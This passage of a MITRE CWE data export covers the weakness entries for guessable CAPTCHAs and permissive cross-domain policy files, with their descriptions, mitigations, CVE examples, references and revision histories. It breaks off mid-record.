"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms, Common_Consequences, Relationships, Taxonomy_Mappings",
"ModificationDate": "2011-06-01",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships, Taxonomy_Mappings",
"ModificationDate": "2012-05-11",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2014-07-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples, Enabling_Factors_for_Exploitation, Modes_of_Introduction, Observed_Examples, Relationships",
"ModificationDate": "2017-11-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships, Taxonomy_Mappings",
"ModificationDate": "2019-01-03",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms, Relationships",
"ModificationDate": "2020-02-24",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description",
"ModificationDate": "2023-01-31",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Detection_Factors, Relationships, Time_of_Introduction",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2008-10-14",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Using Non-Canonical Paths for Authorization Decisions",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "863",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] | null |
[
{
"Description": "Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect \"sources\" (origins of input) with \"sinks\" (destinations where the data interacts with external components, a lower layer such as the OS, etc.)",
"DetectionMethodID": "DM-14",
"Effectiveness": "High",
"EffectivenessNotes": null,
"Method": "Automated Static Analysis"
}
] |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "Example from CAPEC (CAPEC ID: 4, \"Using Alternative IP Address Encodings\"). An attacker identifies an application server that applies a security policy based on the domain and application name, so the access control policy covers authentication and authorization for anyone accessing http://example.domain:8080/application. However, by putting in the IP address of the host the application authentication and authorization controls may be bypassed http://192.168.0.1:8080/application. The attacker relies on the victim applying policy to the namespace abstraction and not having a default deny policy in place to manage exceptions.",
"Language": null,
"Nature": null,
"Reference": null
}
],
"ID": null
}
] | null | null |
High
| null | 1
|
[
[
"284",
"285",
"863",
"647"
]
] |
[] |
804
|
Guessable CAPTCHA
|
Base
|
Simple
|
Incomplete
|
The product uses a CAPTCHA challenge, but the challenge can be guessed or automatically recognized by a non-human actor.
|
An automated attacker could bypass the intended protection of the CAPTCHA challenge and perform actions at a higher frequency than humanly possible, such as launching spam attacks.
There can be several different causes of a guessable CAPTCHA:
- An audio or visual image that does not have sufficient distortion from the unobfuscated source image.
- A question is generated with a format that can be automatically recognized, such as a math question.
- A question for which the number of possible answers is limited, such as birth years or favorite sports teams.
- A general-knowledge or trivia question for which the answer can be accessed using a data base, such as country capitals or popular entertainers.
- Other data associated with the CAPTCHA may provide hints about its contents, such as an image whose filename contains the word that is used in the CAPTCHA.
|
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
},
{
"Class": null,
"Name": "Web Server",
"Prevalence": "Sometimes",
"Type": "Technology"
}
] | null |
[
{
"Note": null,
"Phase": "Architecture and Design"
},
{
"Note": null,
"Phase": "Implementation"
}
] |
[
{
"Impact": [
"Bypass Protection Mechanism",
"Other"
],
"Likelihood": null,
"Note": "When authorization, authentication, or another protection mechanism relies on CAPTCHA entities to ensure that only human actors can access certain functionality, then an automated attacker such as a bot may access the restricted functionality by guessing the CAPTCHA.",
"Scope": [
"Access Control",
"Other"
]
}
] | null |
[
{
"Description": "Chain: appointment booking app uses a weak hash (CWE-328) for generating a CAPTCHA, making it guessable (CWE-804)",
"Link": "https://www.cve.org/CVERecord?id=CVE-2022-4036",
"Reference": "CVE-2022-4036"
}
] | null |
[
{
"EntryID": "21",
"EntryName": "Insufficient Anti-Automation",
"MappingFit": null,
"TaxonomyName": "WASC"
}
] | null |
[
{
"Authors": [
"Web Application Security Consortium"
],
"Edition": null,
"ExternalReferenceID": "REF-731",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": null,
"Publisher": null,
"Section": null,
"Title": "Insufficient Anti-automation",
"URL": "http://projects.webappsec.org/Insufficient+Anti-automation",
"URLDate": null
}
] | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": "New entry to handle anti-automation as identified in WASC.",
"SubmissionDate": "2010-01-15",
"SubmissionName": "CWE Content Team",
"SubmissionOrganization": "MITRE",
"SubmissionReleaseDate": "2010-02-16",
"SubmissionVersion": "1.8",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences",
"ModificationDate": "2010-06-21",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences, Relationships",
"ModificationDate": "2011-06-01",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms, Likelihood_of_Exploit",
"ModificationDate": "2017-11-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2020-02-24",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description, Relationships",
"ModificationDate": "2022-10-13",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description",
"ModificationDate": "2023-01-31",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Observed_Examples",
"ModificationDate": "2023-10-26",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "863",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
},
{
"CweID": "1390",
"Nature": "ChildOf",
"Ordinal": null,
"ViewID": "1000"
}
] |
[
{
"Description": null,
"Ordinality": "Primary"
}
] | null | null | null | null | null | null | 2
|
[
[
"284",
"285",
"863",
"804"
],
[
"284",
"287",
"1390",
"804"
]
] |
[] |
942
|
Permissive Cross-domain Policy with Untrusted Domains
|
Variant
|
Simple
|
Incomplete
|
The product uses a cross-domain policy file that includes domains that should not be trusted.
|
A cross-domain policy file ("crossdomain.xml" in Flash and "clientaccesspolicy.xml" in Silverlight) defines a list of domains from which a server is allowed to make cross-domain requests. When making a cross-domain request, the Flash or Silverlight client will first look for the policy file on the target server. If it is found, and the domain hosting the application is explicitly allowed to make requests, the request is made.
Therefore, if a cross-domain policy file includes domains that should not be trusted, such as when using wildcards, then the application could be attacked by these untrusted domains.
An overly permissive policy file allows many of the same attacks seen in Cross-Site Scripting (CWE-79). Once the user has executed a malicious Flash or Silverlight application, they are vulnerable to a variety of attacks. The attacker could transfer private information, such as cookies that may include session information, from the victim's machine to the attacker. The attacker could send malicious requests to a web site on behalf of the victim, which could be especially dangerous to the site if the victim has administrator privileges to manage that site.
In many cases, the attack can be launched without the victim even being aware of it.
|
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
},
{
"Class": "Web Based",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Technology"
}
] | null |
[
{
"Note": null,
"Phase": "Implementation"
},
{
"Note": "COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic.",
"Phase": "Architecture and Design"
}
] |
[
{
"Impact": [
"Execute Unauthorized Code or Commands",
"Bypass Protection Mechanism",
"Read Application Data",
"Varies by Context"
],
"Likelihood": null,
"Note": "An attacker may be able to bypass the web browser's same-origin policy. An attacker can exploit the weakness to manipulate or steal cookies, create requests that can be mistaken for those of a valid user, compromise confidential information, or execute malicious code on the end user systems for a variety of nefarious purposes. Other damaging attacks include the disclosure of end user files, installation of Trojan horse programs, redirecting the user to some other page or site, running ActiveX controls (under Microsoft Internet Explorer) from sites that a user perceives as trustworthy, and modifying presentation of content.",
"Scope": [
"Confidentiality",
"Integrity",
"Availability",
"Access Control"
]
}
] |
[
{
"Description": "Avoid using wildcards in the cross-domain policy file. Any domain matching the wildcard expression will be implicitly trusted, and can perform two-way interaction with the target server.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design"
],
"Strategy": "Attack Surface Reduction"
},
{
"Description": "For Flash, modify crossdomain.xml to use meta-policy options such as 'master-only' or 'none' to reduce the possibility of an attacker planting extraneous cross-domain policy files on a server.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design",
"Operation"
],
"Strategy": "Environment Hardening"
},
{
"Description": "For Flash, modify crossdomain.xml to use meta-policy options such as 'master-only' or 'none' to reduce the possibility of an attacker planting extraneous cross-domain policy files on a server.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design",
"Operation"
],
"Strategy": "Attack Surface Reduction"
}
] |
[
{
"Description": "Product has a Silverlight cross-domain policy that does not restrict access to another application, which allows remote attackers to bypass the Same Origin Policy.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2012-2292",
"Reference": "CVE-2012-2292"
},
{
"Description": "The default Flash Cross Domain policies in a product allows remote attackers to access user files.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2014-2049",
"Reference": "CVE-2014-2049"
},
{
"Description": "Chain: Adobe Flash Player does not sufficiently restrict the interpretation and usage of cross-domain policy files, which makes it easier for remote attackers to conduct cross-domain and cross-site scripting (XSS) attacks.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2007-6243",
"Reference": "CVE-2007-6243"
},
{
"Description": "Chain: Adobe Flash Player and earlier does not properly interpret policy files, which allows remote attackers to bypass a non-root domain policy.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2008-4822",
"Reference": "CVE-2008-4822"
},
{
"Description": "Chain: Adobe Flash Player does not properly handle unspecified encodings during the parsing of a cross-domain policy file, which allows remote web servers to bypass intended access restrictions via unknown vectors.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2010-3636",
"Reference": "CVE-2010-3636"
}
] | null | null | null |
[
{
"Authors": [
"Apurva Udaykumar"
],
"Edition": null,
"ExternalReferenceID": "REF-943",
"Publication": null,
"PublicationDay": "19",
"PublicationMonth": "11",
"PublicationYear": "2012",
"Publisher": "Adobe",
"Section": null,
"Title": "Setting a crossdomain.xml file for HTTP streaming",
"URL": "https://web.archive.org/web/20121124184922/http://www.adobe.com/devnet/adobe-media-server/articles/cross-domain-xml-for-streaming.html",
"URLDate": "2023-04-07"
},
{
"Authors": [
"Adobe"
],
"Edition": null,
"ExternalReferenceID": "REF-944",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": null,
"Publisher": "Adobe",
"Section": null,
"Title": "Cross-domain policy for Flash movies",
"URL": "http://kb2.adobe.com/cps/142/tn_14213.html",
"URLDate": null
},
{
"Authors": [
"Microsoft Corporation"
],
"Edition": null,
"ExternalReferenceID": "REF-945",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": null,
"Publisher": null,
"Section": null,
"Title": "HTTP Communication and Security with Silverlight",
"URL": "https://learn.microsoft.com/en-us/previous-versions/windows/silverlight/dotnet-windows-silverlight/cc838250(v=vs.95)?redirectedfrom=MSDN",
"URLDate": "2023-04-07"
},
{
"Authors": [
"Microsoft Corporation"
],
"Edition": null,
"ExternalReferenceID": "REF-946",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": null,
"Publisher": null,
"Section": null,
"Title": "Network Security Access Restrictions in Silverlight",
"URL": "https://learn.microsoft.com/en-us/previous-versions/windows/silverlight/dotnet-windows-silverlight/cc645032(v=vs.95)",
"URLDate": "2023-04-07"
},
{
"Authors": [
"Dongseok Jang",
"Aishwarya Venkataraman",
"G. Michael Sawka",
"Hovav Shacham"
],
"Edition": null,
"ExternalReferenceID": "REF-947",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": "05",
"PublicationYear": "2011",
"Publisher": null,
"Section": null,
"Title": "Analyzing the Crossdomain Policies of Flash Applications",
"URL": "http://cseweb.ucsd.edu/~hovav/dist/crossdomain.pdf",
"URLDate": null
}
] | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": "Created by MITRE with input from members of the CWE-Research mailing list.",
"SubmissionDate": "2014-06-05",
"SubmissionName": "CWE Content Team",
"SubmissionOrganization": "MITRE",
"SubmissionReleaseDate": "2014-06-23",
"SubmissionVersion": "2.7",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Modes_of_Introduction, References, Relationships",
"ModificationDate": "2017-11-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2019-06-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms, Relationships",
"ModificationDate": "2020-02-24",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description, Name",
"ModificationDate": "2020-06-25",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2021-10-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description, Relationships",
"ModificationDate": "2023-01-31",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Detection_Factors, References, Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes, Relationships",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples",
"ModificationDate": "2024-02-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": "2024-02-29",
"ModificationVersion": "4.14",
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2020-02-26",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Overly Permissive Cross-domain Whitelist",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "863",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
},
{
"CweID": "923",
"Nature": "ChildOf",
"Ordinal": null,
"ViewID": "1000"
},
{
"CweID": "183",
"Nature": "ChildOf",
"Ordinal": null,
"ViewID": "1000"
},
{
